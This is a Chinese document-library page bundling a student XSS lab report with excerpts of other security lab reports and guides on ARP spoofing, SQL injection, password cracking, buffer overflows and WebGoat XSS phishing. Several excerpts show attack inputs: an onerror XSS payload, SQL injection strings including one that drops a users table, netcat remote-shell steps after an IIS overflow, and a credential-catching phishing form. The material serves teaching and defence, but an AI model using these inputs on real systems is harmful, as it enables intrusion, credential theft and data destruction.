当前位置：文档库 › 跨站脚本攻击(xss)实验报告

跨站脚本攻击(xss)实验报告

ZHUHAI CAMPAUS OF BEIJING INSTITUTE OF TECHNOLOGY 实验题目跨站脚本攻击（xss）实验实验时间2014.5.13

一、实验目的：

了解跨站脚本，并知道如何发现跨站脚本及如何利用跨站脚本

二、实验内容以及步骤：

(1)打开Windows实验台，然后在IE浏览器中输入http://localhost/xss-test.asp，得到如图

所示的界面，此网页可以直接输出文本框中输入的内容。

(2)尝试输入任意字符、符号、数字，查看网页，如下所示。

图3.6.2-2输入字母“wwww123”所得页面

图3.6.2-3输入数字“pppp456”

从上面的图片可以看出，页面是显示正常的。

(3)检测能否XSS

在输入栏中分别输入：

弹出提示框

弹出用户COOKIES

在当前页插入另一站点

并查看效果，效果分别如下所示。

通过上面的实验，能够看出，由于页面对于特殊符号未进行过滤，导致了跨站的产生，如果这时标签内所嵌入的网站，进行了属性的修饰，设定了页面的宽度和高度，而且都设置为0，那么所内嵌的页面就不会显示。</p><p>三、思考题：</p><p>1、跨站脚本攻击原理</p><p>用户提交的变量没有经过完整过滤Html字符或者根本就没有经过过滤就放到了数据库中，一个恶意用户提交的Html代码被其它浏览该网站的用户访问，通过这些Html代码也就间接控制了浏览者的浏览器，就可以做很多的事情，如：窃取敏感信息、引导访问者的浏览器去访问恶意网站等。</p><p>2.XSS攻击的两种方式</p><p>内跨站(来自自身的攻击)主要指的是利用程序自身的漏洞，构造跨站语句。</p><p>外跨站(来自外部的攻击)主要指的自己构造XSS跨站漏洞网页或者寻找非目标机以外的有跨站漏洞的网页。</p><p>四、实验总结：</p><p>通过本次实验，我了解了跨站脚本基本攻击原理是：用户提交的变量没有经过完整过滤Html 字符或者根本就没有经过过滤就放到了数据库中，一个恶意用户提交的Html代码被其它浏览该网站的用户访问，通过这些Html代码也就间接控制了浏览者的浏览器。从网站开发者的角度看，应做到如下几点以防止任何已成功注入的脚本在浏览器端运行：输入验证，输出编码，注意黑名单验证方式的局限性，警惕规范化错误。</p><h2>ARP攻击实验报告</h2><p>网络入侵实验报告学号：0867010077 姓名：*** 一．实验目的： 1、了解基本的网络攻击原理和攻击的主要步骤； 2、掌握网络攻击的一般思路； 3、了解arp攻击的主要原理和过程；二．实验原理： arp攻击就是通过伪造ip地址和mac地址实现arp欺骗，能够在网络中产生大量的arp 通信量使网络阻塞，攻击者只要持续不断的发出伪造的arp响应包就能更改目标主机arp缓存中的ip-mac条目，造成网络中断或中间人攻击。 arp攻击主要是存在于局域网网络中，局域网中若有一台计算机感染arp木马，则感染该arp木马的系统将会试图通过“arp欺骗”手段截获所在网络内其它计算机的通信信息，并因此造成网内其它计算机的通信故障。某机器a要向主机b发送报文，会查询本地的arp缓存表，找到b的ip地址对应的mac 地址后，就会进行数据传输。如果未找到，则a广播一个arp请求报文（携带主机a的ip 地址ia——物理地址pa），请求ip地址为ib的主机b回答物理地址pb。网上所有主机包括 b都收到arp请求，但只有主机b识别自己的ip地址，于是向a主机发回一个arp响应报文。其中就包含有b的mac地址，a接收到b的应答后，就会更新本地的arp缓存。接着使用这个mac地址发送数据（由网卡附加mac地址）。因此，本地高速缓存的这个arp表是本地网络流通的基础，而且这个缓存是动态的。本实验的主要目的是在局域网内，实施arp攻击，使局域网的网关失去作用，导致局域网内部主机无法与外网通信。三．实验环境：windows xp操作系统，iris抓包软件四．实验步骤： 1，安装iris，第一次运行iris后会出现一个要你对适配器的选择的界面，点击适配器类型，点击确定就可以了：如图1-1；图1-1 2对编辑过滤器进行设置（edit filter settings），设置成包含arp 如图1-2；图1-2 3.点击iris的运行按钮（那个绿色的按钮）,或捕获（capture）按钮。如图1-2：图1-3 开始捕获数据包 4.捕获到的数据如图所示，选择一个你要攻击的主机，我们这里选择的是ip为10.3.3.19 的主机，选择的协议一定要是arp的数据包。如图1-4：图1-4篇二：arp攻击实验报告如下图，打开路由web控制页面中的信息检测-arp攻击检测，如下图设置完后，如果有arp攻击，就会显示出来，如图，内网ip地址为192.168.101.249 有arp攻击如果以后内网还有掉线现象，检查一下这里就可以了。</p><h2>跨站脚本攻击实例解析</h2><p>跨站脚本攻击实例解析作者：泉哥主页：https://www.wendangku.net/doc/e516009314.html, 前言跨站攻击，即Cross Site Script Execution(通常简写为XSS，因为CSS与层叠样式表同名，故改为XSS) 是指攻击者利用网站程序对用户输入过滤不足，输入可以显示在页面上对其他用户造成影响的HTML 代码，从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。很多人对于XSS的利用大多停留在弹框框的程度，一些厂商对XSS也是不以为然，都认为安全级别很低，甚至忽略不计。本文旨在讲述关于跨站攻击的利用方式，并结合实例进行分析。漏洞测试关于对XSS的漏洞测试，这里就以博客大巴为例进行测试，最近我也在上面发现了多处跨站漏洞，其中两处已公布在WooYun网站上，其主要内容如下：漏洞详情简要描述：博客大巴存储型XSS漏洞详细说明：在“个人信息设置”的“附加信息”一项中，由于对“个人简介”的内容过滤不严，导致可在博客首页实现跨站，而在下方“添加一段附加信息”中，由于对“信息标题”内容过滤不严，同样可导致跨站的出现。但我刚又测试了一下，发现官方只修补了其中一个漏洞（个人简介），而另一个漏洞得在博客管理后台才能触发，利用价值不大。与此同时我在对博客模板的测试中，又发现了五处跨站漏洞，估计这些漏洞其实很早就有人发现了，只是没人公布或者报给blogbus后仍未修补。这次报给WooYun的主要目的是让blogbus修补此漏洞，因为我的博客就在上面！^_^ 其余五处漏洞分别在“编辑自定义模板”中，由于对代码模块head,index,index-post,detail,detail-post等处的代码过滤不严，导致跨站的发生，分别向其写入<img src="#" onerror=alert("head")></img>，为便于区别，我将提示语句更改为对应的名称，前三项在首页可触发脚本，后两项需打开文章才可触发，测试结果如图1、2所示：图1（在首页触发）</p><h2>网络攻防实验报告</h2><p>HUNAN UNIVERSITY 课程实习报告题目：网络攻防学生姓名李佳学生学号201308060228 专业班级保密1301班指导老师钱鹏飞老师完成日期2016/1/3 完成实验总数：13 具体实验：1.综合扫描 2.使用 Microsoft 基线安全分析器</p><p>3.DNS 溢出实验 4. 堆溢出实验 5.配置Windows系统安全评估 6.Windows 系统帐户安全评估 7.弱口令破解 8.邮件明文窃听 9.网络APR攻击 10.Windows_Server_IP安全配置 11.Tomcat管理用户弱口令攻击 12.木马灰鸽子防护 13.ping扫描 1.综合扫描 X-scan 采用多线程方式对指定IP地址段(或单机)进行安全漏洞检测，支持插件功能，提供了图形界面和命令行两种操作方式，扫描内容包括：远程操作系统类型及版本，标准端口状态及端口BANNER信息，SNMP信息，CGI漏洞，IIS漏洞，RPC漏洞，SSL漏洞，SQL-SERVER、FTP-SERVER、SMTP-SERVER、POP3-SERVER、NT-SERVER弱口令用户，NT服务器NETBIOS信息、</p><p>注册表信息等。 2.使用 Microsoft 基线安全分析器 MBSA：安全基线是一个信息系统的最小安全保证, 即该信息系统最基本需要满足的安全要求。信息系统安全往往需要在安全付出成本与所能够承受的安全风险之间进行平衡, 而安全基线正是这个平衡的合理的分界线。不满足系统最基本的安全需求, 也就无法承受由此带来的安全风险, 而非基本安全需求的满足同样会带来超额安全成本的付出, 所以构造信息系统安全基线己经成为系统安全工程的首要步骤, 同时也是进行安全评估、解决信息系统安全性问题的先决条件。微软基线安全分析器可对系统扫描后将生成一份检测报告，该报告将列举系统中存在的所有漏洞和弱点。 3.DNS 溢出实验 DNS溢出DNS 的设计被发现可攻击的漏洞，攻击者可透过伪装 DNS 主要服务器的方式，引导使用者进入恶意网页，以钓鱼方式取得信息，或者植入恶意程序。 MS06‐041：DNS 解析中的漏洞可能允许远程代码执行。 Microsoft Windows 是微软发布的非常流行的操作系统。 Microsoft Windows DNS 服务器的 RPC 接口在处理畸形请求时存在栈溢出漏洞，远程攻击者可能利用此漏洞获取服务器的管理权限。</p><h2>口令攻击实验</h2><p>1. 实验报告如有雷同，雷同各方当次实验成绩均以0分计。在规定时间内未上交实验报告的，不得以其他方式补交，当次成绩按0分计。 3.实验报告文件以PDF 格式提交。口令攻击实验【实验目的】通过密码破解工具的使用,了解账号口令的安全性,掌握安全口令设置原则,以保护账号口令的安全。【实验原理】有关系统用户账号密码口令的破解主要是基于密码匹配的破解方法，最基本的方法有两个，即穷举法和字典法。穷举法就是效率最低的办法，将字符或数字按照穷举的规则生成口令字符串，进行遍历尝试。在口令密码稍微复杂的情况下，穷举法的破解速度很低。字典法相对来说效率较高，它用口令字典中事先定义的常用字符去尝试匹配口令。口令字典是一个很大的文本文件，可以通过自己编辑或者由字典工具生成，里面包含了单词或者数字的组合。如果密码就是一个单词或者是简单的数字组合那么破解者就可以很轻易的破解密码。目前常见的密码破解和审核工具有很多种，例如破解Windows 平台口令的L0phtCrack 、 WMICracker 、SMBCrack 、CNIPC NT 弱口令终结者以及商用的工具：Elcomsoft 公司的 Adanced NT Security Explorer 和Proactive Windows Security Explorer 、Winternals 的Locksmith 等，用于Unix 平台的有John the Ripper 等。本实验主要通过L0phtCrack 的使用，了解用户口令的安全性。【实验要求】 1.请指出Windows 7的口令保护文件存于哪个路径？ 2.下载口令破解软件L0phtCrack(简写为LC ，6.0以上版本)，简述其工作原理，并熟悉其用法。 3.请描述“字典攻击”的含义。 4.在主机内用命令行命令（net user ）建立用户名“test ”，密码分别陆续设置为空密码、“123123”、“security ”、“974a3K%n_4$Fr1#”进行测试，在Win7能破解这些口令吗？如果能，比较这些口令的破解时间，能得出什么结论？如果不能，请说明原因。 5.下载并安装WinPE(Windows PreInstallation Environment ，Windows 预安装环境），复制出硬盘中的SAM 文件，将文件导入LC 破解，写出步骤和结果，回答4的“如果能”提问。 6.根据实验分析，请提出增加密码口令安全性的方法和策略。【实验过程】 1.Windows 7的口令保护文件存于系统盘下Windows\System32\config 中，其名为SAM</p><h2>SQL注入攻击实验报告</h2><p>实验报告（实验名称：SQL注入攻击）</p><p>一、实验目的通过SQL注入攻击，掌握网站的工作机制，认识到SQL注入攻击的防范措施，加强对Web攻击的防范。二、实验环境描述实验开展所基于的网络环境，给出网络拓扑、IP地址、web服务器、客户机等信息。宿主机（客户机）：操作系统为Windows 10，IP为192.168.18.11，在主机上安装虚拟化软件Vmware Player，在此基础上创建虚拟机并安装操作系统，进行网络配置，采用环回适配器，桥接模式，实现宿主机与虚拟机之间的网络通信，虚拟机（Web服务器）：操作系统为Windows XP，IP为192.168.18.9，本实验利用windows 的iis 服务搭建了一个有SQL 注入漏洞的网站“ASP 新闻发布系统”，以该网站为目标，对其实施SQL 注入攻击。本实验所需工具如下： IIS 是Internet Information Server 的缩写，是微软提供的Internet 服务器软件，包括Web、等服务器，也是目前常用的服务器软件。版本不限。 “啊D”注入工具：对“MSSQL 显错模式”、“MSSQL 不显错模式”、“Access”等数据库都有很好的注入检测能力，内集“跨库查询”、“注入点扫描”、“管理入口检测”、“目录查看”等等于一身的注入工具包。 “ASP 新闻发布系统”Ok3w v4.6 源码。三、实验内容（一）配置实验环境，首先选择网络适配器，安装环回适配器，在主机上安装Vmware Player，成功启动虚拟机。接着配置宿主机和虚拟机的IP，如图要注意的是，配置主机上的IP时，应该选择VMnet8，并且注意勾取Bridge</p><h2>缓冲区溢出攻击实验报告</h2><p>缓冲区溢出攻击实验报告班级：10网工三班学生姓名：谢昊天学号：46 实验目的和要求： 1、掌握缓冲区溢出的原理； 2、了解缓冲区溢出常见的攻击方法和攻击工具；实验内容与分析设计： 1、利用RPC漏洞建立超级用户利用工具文件检测RPC漏洞，利用工具软件对进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。 2、利用IIS溢出进行攻击利用软件Snake IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口。 3、利用WebDav远程溢出使用工具软件和远程溢出。实验步骤与调试过程： 1．RPC漏洞出。首先调用RPC（Remote Procedure Call)。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务。利用RPC漏洞建立超级用户。首先，把文件拷贝到C盘跟目录下，检查地址段到。点击开始>运行>在运行中输入cmd>确定。进入DOs模式、在C盘根目录下输入 -,回车。检查漏洞。 2．检查缓冲区溢出漏洞。利用工具软件对进行攻击。在进入DOC模式、在C盘根目录下输入 ,回车。 3,利用软件Snake IIS溢出工具可以让对方的IIS溢出。进入IIS溢出工具软件的主界面. PORT:80 监听端口为813 单击IDQ溢出。出现攻击成功地提示对话框。 4．利用工具软件连接到该端口。进入DOs模式，在C盘根目录下输入 -vv 813 回车。5．监听本地端口（1）先利用命令监听本地的813端口。进入DOs模式，在C盘根目录下输入nc -l -p 813回车。（2）这个窗口就这样一直保留，启动工具软件snake，本地的IP 地址是，要攻击的计算机的IP地址是，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813.点击按钮“IDQ溢出”。（3）查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来，进入DOC模式，在C盘根目录下输入nc -l -p 813回车。 6．利用WebDav远程溢出使用工具软件和远程溢出。（1）在DOS命令行下执行，进入DOC 模式，在C盘根目录下输入回车。（2）程序入侵对方的计算机进入DOC模式，在C盘根目录下输入nc -vv 7788 回车。实验结果： 1．成功加载RPC服务。可以在服务列表中看到系统的RPC服务，见结果图。 2．成功利用工具软件对进行攻击。 3．成功利用IIS溢出进行攻击利用软件Snake IIS溢出工具让对方的IIS溢出，从而捆绑</p><h2>跨网站脚本攻击(XSS)的原理与防范对策</h2><p>摘要：随着计算机网络技术的迅速发展，网络安全问题已变得越来越受到人们的重视，网络攻击形式多种多样，很多蠕虫病毒、木马病毒等植入到某些网页中，给网络用户带来了很大的安全隐患。其中XSS跨网站脚本攻击，恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意攻击用户的特殊目的。本文主要阐述了XSS的机理和特点，重点分析了网页代码的检测以及木马的特征，并针对这些特点进行了一些相应防范对策的探讨。关键词：网页木马； XSS；攻击；防范一、前言网页木马是一种新型的恶意代码，一些攻击者将它人为的植入到服务器端的HTML页面中，通过客户端对服务器的访问来传播恶意攻击代码，它主要是通过浏览器以及其中的一些插件漏洞来进行植入，网页木马是一种客户端的攻击方式，它能有效的绕过防火墙的检测，隐秘的在客户端将恶意代码植入，客户端在不知情的情况下将这些恶意可执行程序进行下载和执行。给互联网用户造成严重的安全威胁。在Web 出现以后，XSS的危害性达到了十分严重的地步。跨站脚本英文名称是（Cross Site Script），为了与层叠样式表（Cascading Style Sheets简称CSS）区分，故命名为XSS。 XSS攻击是指入侵者在远程WEB页面的HTML代码中插入具有恶意目的的数据，用户认为该页面是可信赖的，但是当浏览器下载该页面时，嵌入其中的脚本将被解释执行。XSS 具有自身的独有特点，目前国内外很多研究人员围绕XSS的防御进行了深入的探讨与研究，同时攻击者也在采用一些更先进的手段来提高木马的攻击隐蔽性，用以提高木马的攻击成功率，因此，XSS的机理与防范对策研究已成为了当前计算机工作者的一个重要课题。二、XSS的机理与特征的成因跨网站脚本XSS漏洞的成因其实就是Html的注入问题，攻击者的输入没有经过严格的控制进入了数据库，最终显示给来访的用户，导致可以在来访用户的浏览器里以浏览用户的身份执行Html代码，数据流程如下：攻击者的Html输入—>web程序—>进入数据库—>web 程序—>用户浏览器。目前，所有的网站上几乎都提供一个站内或站外信息搜索框。在此搜索框中，您可以搜索到网站上任何可用的东西。这个搜索表单看起来这样：图1-1</p><h2>网络攻击与防范实验报告</h2><p>网络攻击与防御技术实验报告姓名：____刘冰__ ___ 学号：__ 所在班级：实验名称：网络数据包的捕获与分析实验日期：_2007_年_10 _月_15 _日指导老师：实验评分：验收评语：参与人员：实验目的：本实验通过研究Winpcap中常用的库函数的使用方式来实现了一个小型的网络数据包抓包器，并通过对原始包文的分析来展示当前网络的运行状况。实验内容： 1.实现对网络基本数据包的捕获 2.分析捕获到的数据包的详细信息实验环境： 1.WpdPack_4_0_1支持库 2.VC++6.0开发环境 3.Windows操作系统实验设计：系统在设计过程中按照MVC的设计模式，整体分为三层。第一层为Control层即控制层，这里为简化设计，将Control层分为两个部分，一部分为网络报文输入，另一部分为用户输入；第二层是Model层即模型层；第三层为View层即显示层。系统的整体运行过程为：从Control层得到数据，交到Model层进行处理，将处理完的结果交View层进行显示。Control层主要用于网络数据包的捕获以及获得用户的输入；Model层主要用于分析数据包，处理用户的输入；View层主要用于对处理后的结果进行显示。</p><p>详细过程：程序在执行过程中有两个核心的工作，一是调用Winpcap函数库实现下层抓包。二是对抓到的包文进行分析。下面分别列出两个核心过程的基本算法与相关的实现代码。抓包算法：第一：初始化Winpcap开发库第二：获得当前的网卡列表，同时要求用户指定要操作的网卡第三：获得当前的过滤规则，可为空第四：调用库函数，pcap_loop（），同时并指定其回调函数，其中其回调函数为数据包分析过程。对应的相应核心代码为： I f((pCap=pcap_open_live(getDevice()->name,65536,1,1000,strErrorBuf))==NULL) { return -1; } If(pcap_compile(pCap, &fcode, filter, 1, NetMask) < 0) { return -1; } if(pcap_setfilter(pCap, &fcode)<0) { return -1; } do{ pcap_loop(pCap,1,pcap_handle,NULL); }while(nFlag); 分析算法：第一：得到数据包，先将其转存到内存里，以备以后再用。第二：分析当前的数据包，分析过程如下： 1.数据包的前14个字节（Byte）代表数据链路层的报文头，其报文格式是前6Byte 为目的MAC地址，随后的6个Byte为源Mac地址，最后的2Byte代表上层协议类型这个数据很重要，是我们分析上层协议的依据。 2.根据1所分析到的协议类型进行类似1的迭代分析。这样就可以得到各层中的报文头信息和数据信息。第三：结束本次分析。分析算法部分实现代码： m_pktHeaders.Add(pHeader); m_pktDatas.Add(pData); CFramePacket *pFramePacket = new CFramePacket(pData,14); if(pFramePacket->GetType() == 0x0800) { CIPPacket ipPacket(pData+14,pHeader->len-14); if(ipPacket.GetProtocol() == "UDP") { CUDPPacket*pUDPPacket = new CUDPPacket(ipPacket.GetTData(),ipPacket.GetDataLength()); } else if(ipPacket.GetProtocol() == "TCP") { CTCPPacket *pTCPPacket = new</p><h2>SQL注入及XSS(跨站脚本)攻击防御技术方案</h2><p>SQL注入及XSS(跨站脚本)攻击防御技术方案 SQL注入、、什么是SQL注入 SQL注入：利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，这是SQL注入的标准释义。 SQL注入利用的是正常的HTTP服务端口，表面上看来和正常的web访问没有区别，隐蔽性极强，不易被发现。、、SQL注入的危害 SQL注入的主要危害包括： 1、未经授权状况下操作数据中的数据 2、恶意篡改网页内容 3、私自添加系统账号或是数据库使用者账号 4、网页挂木马。、、SQL注入的方法 1.没有正确过滤转义字符在用户的输入没有为转义字符过滤时，就会发生这种形式的注入式攻击，它会被传递给一个SQL语句。这样就会导致应用程序的终端用户对数据库上的语句实施操纵比方说，下面的这行代码就会演示这种漏洞： statement := "SELECT * FROM users WHERE name = '" + userName + "'; "</p><p>这种代码的设计目的是将一个特定的用户从其用户表中取出，但是，如果用户名被一个恶意的用户用一种特定的方式伪造，这个语句所执行的操作可能就不仅仅是代码的作者所期望的那样了。例如，将用户名变量(即username)设置为：a' or 't'='t，此时原始语句发生了变化： SELECT * FROM users WHERE name = 'a' OR 't'='t'; 如果这种代码被用于一个认证过程，那么这个例子就能够强迫选择一个合法的用户名，因为赋值't'='t永远是正确的。在一些SQL服务器上，如在SQL　 Server中，任何一个SQL命令都可以通过这种方法被注入，包括执行多个语句。下面语句中的username的值将会导致删除“users”表，又可以从“data”表中选择所有的数据(实际上就是透露了每一个用户的信息)。 a'; DROP TABLE users; SELECT * FROM data WHERE name LIKE '% 这就将最终的SQL语句变成下面这个样子： SELECT * FROM users WHERE name = 'a'; DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%'; 其它的SQL执行不会将执行同样查询中的多个命令作为一项安全措施。这会防止攻击者注入完全独立的查询，不过却不会阻止攻击者修改查询。 2.Incorrect type handling 如果一个用户提供的字段并非一个强类型，或者没有实施类型强制，就会发生这种形式的攻击。当在一个SQL语句中使用一个数字字段时，如果程序员没有检</p><h2>跨站脚本攻击的危害和防护方法</h2><p>跨站脚本攻击的危害和防护方法跨站脚本攻击（也称为XSS）指利用网站漏洞从用户那里恶意盗取信息。用户在浏览网站、使用即时通讯软件、甚至在阅读电子邮件时，通常会点击其中的链接。攻击者通过在链接中插入恶意代码，就能够盗取用户信息。攻击者通常会用十六进制（或其他编码方式）将链接编码，以免用户怀疑它的合法性。网站在接收到包含恶意代码的请求之后会产成一个包含恶意代码的页面，而这个页面看起来就像是那个网站应当生成的合法页面一样。许多流行的留言本和论坛程序允许用户发表包含HTML和javascript的帖子。假设用户甲发表了一篇包含恶意脚本的帖子，那么用户乙在浏览这篇帖子时，恶意脚本就会执行，盗取用户乙的session信息。人们经常将跨站脚本攻击(Cross Site Scripting)缩写为CSS，但这会与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。因此有人将跨站脚本攻击缩写为XSS。如果你听到有人说“我发现了一个XSS 漏洞”，显然他是在说跨站脚本攻击。危害为了搜集用户信息，攻击者通常会在有漏洞的程序中插入JavaScript、VBScript、ActiveX或Flash 以欺骗用户（详见下文）。一旦得手，他们可以盗取用户帐户，修改用户设置，盗取/污染cookie，做虚假广告等。每天都有大量的XSS攻击的恶意代码出现。Brett Moore的下面这篇文章详细地阐述了“拒绝服务攻击”以及用户仅仅阅读一篇文章就会受到的“自动攻击”。攻击三部曲 1.HTML注入。所有HTML注入范例只是注入一个JavaScript弹出式的警告框：alert(1)。 2.做坏事。如果您觉得警告框还不够刺激，当受害者点击了一个被注入了HTML代码的页面链接时攻击者能作的各种的恶意事情。 3.诱捕受害者。从网站开发者角度，如何防护XSS攻击? 来自应用安全国际组织OWASP的建议，对XSS最佳的防护应该结合以下两种方法：验证所有输入数据，有效检测攻击;对所有输出数据进行适当的编码，以防止任何已成功注入的脚本在浏览器端运行。具体如下： ·输入验证：某个数据被接受为可被显示或存储之前，使用标准输入验证机制，验证所有输入数据的长度、类型、语法以及业务规则。 ·强壮的输出编码：数据输出前，确保用户提交的数据已被正确进行entity编码，建议对所有字符进行编码而不仅局限于某个子集。 ·明确指定输出的编码方式(如ISO 8859-1或UTF 8)：不要允许攻击者为你的用户选择编码方式。 ·注意黑名单验证方式的局限性：仅仅查找或替换一些字符(如"<" ">"或类似"script"的关键字)，很容易被XSS变种攻击绕过验证机制。 ·警惕规范化错误：验证输入之前，必须进行解码及规范化以符合应用程序当前的内部表示方法。请确定应用程序对同一输入不做两次解码。从网站用户角度，如何防护XSS攻击? 当你打开一封Email或附件、浏览论坛帖子时，可能恶意脚本会自动执行，因此，在做这些操作时一定要特别谨慎。建议在浏览器设置中关闭JavaScript。如果使用IE浏览器，将安全级别设置到“高”。具体可以参照浏览器安全的相关文章。</p><h2>网络攻击与防御实验报告全解</h2><p>西安电子科技大学本科生实验报告姓名:王东林学院:计算机科学院专业:信息安全班级:13级本科班实验课程名称:网络攻击与防御实验日期:2015年10月15日指导教师及职称:金涛实验成绩: 开课时间： 2016-2017 学年第一学期</p><p>实验题目网络攻击与防御小组合作否姓名王东林班级13级信息安全本科班学号201383030115 一、实验目的 1.了解网络连通测试的方法和工作原理。 2.掌握ping命令的用法。 3.了解网络扫描技术的基本原理。 4.掌握xscan工具的使用方法和各项功能。 5.通过使用xscan工具，对网络中的主机安全漏洞信息等进行探测。 6.掌握针对网络扫描技术的防御方法。 7.了解路由的概念和工作原理。 8.掌握探测路由的工具的使用方法和各项功能，如tracert等。 9.通过使用tracert工具，对网络中的路由信息等进行探测，学会排查网络故障。 10.了解网络扫描技术的基本原理。 11.掌握nmap工具的使用方法和各项功能。 12.通过使用nmap工具，对网络中的主机信息等进行探测。 13.掌握针对网络扫描技术的防御方法。 14．掌握Linux帐号口令破解技术的基本原理、常用方法及相关工具 15．掌握如何有效防范类似攻击的方法和措施 16.掌握帐号口令破解技术的基本原理、常用方法及相关工具 17.掌握如何有效防范类似攻击的方法和措施 18.掌握帐号口令破解技术的基本原理、常用方法及相关工具 19.掌握如何有效防范类似攻击的方法和措施</p><p>二．实验环境 1、实验环境 1)本实验需要用到靶机服务器，实验网络环境如图1所示。靶机服务器配置为Windows2000 Server,安装了IIS服务组件，并允许FTP匿名登录。由于未打任何补丁，存在各种网络安全漏洞。在靶机服务器上安装有虚拟机。该虚拟机同样是Windows2000 Professional系统，但进行了主机加固。做好了安全防范措施，因此几乎不存在安全漏洞。 2）学生首先在实验主机上利用Xscan扫描靶机服务器P3上的漏洞，扫描结束发现大量漏洞之后用相同方法扫描靶机服务器上的虚拟机P4。由于该靶机服务器上的虚拟机是安装了各种补丁和进行了主机加固的，因此几乎没有漏洞。在对比明显的实验结果中可见，做好安全防护措施的靶机服务器虚拟机上的漏洞比未做任何安全措施的靶机服务器少了很多，从而加强学生的网络安全意识。实验网络拓扑如图1。三. 实验内容与步棸 Ping命令是一种TCP/IP实用工具，在DOS和UNIX系统下都有此命令。它将您的计算机与目标服务器间传输一个数据包，再要求对方返回一个同样大小的数据包来确定两台网络机器是否连接相通。 1．在命令提示符窗口中输入：ping。了解该命令的详细参数说明。</p><h2>WebGoat笔记九_跨站脚本攻击(Cross-Site Scripting (XSS))</h2><p>WebGoat学习笔记九 —跨站脚本攻击(Cross-Site Scripting (XSS)) 瞿靖东2015/11/10 版本号：WebGoat 5.4 1、使用XSS钓鱼(Phishing with XSS) 技术概念或主题(Concept / T opic T o T each) 在服务端对所有输入进行验证总是不错的做法。当用户输入非法HTTP响应时容易造成XSS。在XSS的帮助下，你可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。技术原理(How It works ) HTML文档内容很容易篡改的，如果你有权限操作页面源代码。总体目标(General Goals ) 创建一个form，要求填写用户名和密码。将数据提交到http://localhost/WebGoat/catcher?PROPERTY=yes&user=catchedUserName&password=catched PasswordNam 操作方法(Solutions) 利用XSS可以在已存在的页面中进一步添加元素。该解决方案包括两部分，你需要结合起来使用: 受害人填写一个表格; 以读取脚本的形式，将收集到的信息发送给攻击者。一个带用户名和密码输入框的表格如下: <form> <br><br><HR><H3>This feature requires account login:</H3 ><br><br> Enter Username:<br><input type="text" id="user" name="user"><br> Enter Password:<br><input type="password" name="pass"><br> </form><br><br><HR></p><h2>网络攻击与防范实验报告</h2><p>网络攻击与防范实验报告姓名：_ ___ 学号：__ 所在班级：实验名称：缓冲区溢出实验实验日期：2014 年11 月9 日指导老师：张玉清实验评分：验收评语：实验目的： 1、掌握缓冲区溢出的原理 2、掌握常用的缓冲区溢出方法 3、理解缓冲区溢出的危害性 4、掌握防范和避免缓冲区溢出攻击的方法实验环境：主机系统：Windows8 x64位虚拟机系统：Windows XP(SP3)（IP：192.168.137.128）溢出对象：war-ftpd 1.65 调试工具：CDB(Debugging Tools for Windows)；开发环境：Visual Studio 2013 开发语言：C语言缓冲区溢出原理：在metasploit中搜索war-ftp可以发现war-ftpd1.65在windows下有以下漏洞username overflow，也就是在用户使用user username这个指令时，如果username 过长就会发生缓冲区溢出。计算机在调用函数function（arg1,…,argm）时，函数栈的布局如图1所示，首先将函数的实参从右往左依次压栈，即argm,…,arg1。然后将函数返回地址RET压栈。这时EBP 指向当前函数的基地址，ESP指向栈顶，将此时的EBP压栈，然后ESP的值赋给EBP，这样EBP就指向新的函数栈的基地址。调用函数后，再将局部变量依次压栈，这时ESP始终指向栈顶。另外还有一个EIP寄存器，EIP中存放的是下一个要执行的指令的地址，程序崩溃时EIP的值就是RET。通过构造特殊的字符串，即两两都不相同的字符串，我们可以根据EIP 的值定位RET的位置。知道了RET的位置以后，我们只要在RET这个位置放上我们想要执行的跳转指令就可以实现跳转。为了方便我们找一个系统中现成的指令jmp esp来实现跳转。jmp esp指令在内存中的通用地址是0x7ffa4512，可以通过CDB的U 7ffa4512来确定该地址中存放的是否为jmp esp。 jmp esp将EIP指向了esp指向的位置，我们用定位RET的办法同样定位ESP指向的位置，然后用shellcode替换这块字符串，这样计算机就会执行shellcode，从而实现攻击。当然，我们还可以用其他的指令，如jmp esi，同样得到jmp esi指令在系统内存中的地址，以及esi指向的内存，我们就可以执行shellcode。也可以使用多次跳转。</p><h2>跨站脚本攻击XSS攻击与防范指南</h2><p>跨站脚本攻击XSS攻击与防范指南文章目录 XSS攻击与防范指南 (1) 第一章、XSS的定义 (1) 第二章、XSS漏洞代码 (1) 第三章、利用XSS盗取cookies. 3 第四章、防范XSS漏洞 (4) 第四章、XSS攻击方法 (4) 第六章、利用Flash进行XSS攻击 (6) 第七章、上传文件进行XSS攻击 (7) 第八章、利用XSS漏洞进行钓鱼 (7) 第一章、XSS的定义从Wikipedia搜索跨站脚本，解释到跨区脚本(Cross-zone Scripting或者Cross Site Scripting)是指浏览器利用浏览器一些有漏洞的安全解决方案，这种攻击使没有权限跨站脚本在未经授权的情况下以较高的权限去执行，脚本的执行权限被客户端(Web浏览器)扩大升级了。这些XSS跨站脚本漏洞可能是： *网页浏览器设计缺陷使得在一定的条件下，一个站点完全信任另外一个高权限的站点(或者连个高低权限区域)并去执行高权限站点的脚本。 *网页浏览器配置错误，把不安全的网站放在浏览器高信任列表。 *信任站点(特权区域)存在跨站脚本漏洞一般的跨站脚本攻击包含两个步骤。首先是利用跨站脚本漏洞以一个特权模式去执行攻击者构造的脚本，然后利用不安全的ActiveX控件执行恶意的行为。通常在安静模式让计算机浏览攻击者指定的网页悄悄下载安装各种恶意代码，如间谍软件、木马软件、蠕虫等。第二章、XSS漏洞代码打开记事本，复制下面的代码到几时本中： <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "https://www.wendangku.net/doc/e516009314.html,/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="https://www.wendangku.net/doc/e516009314.html,/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <style 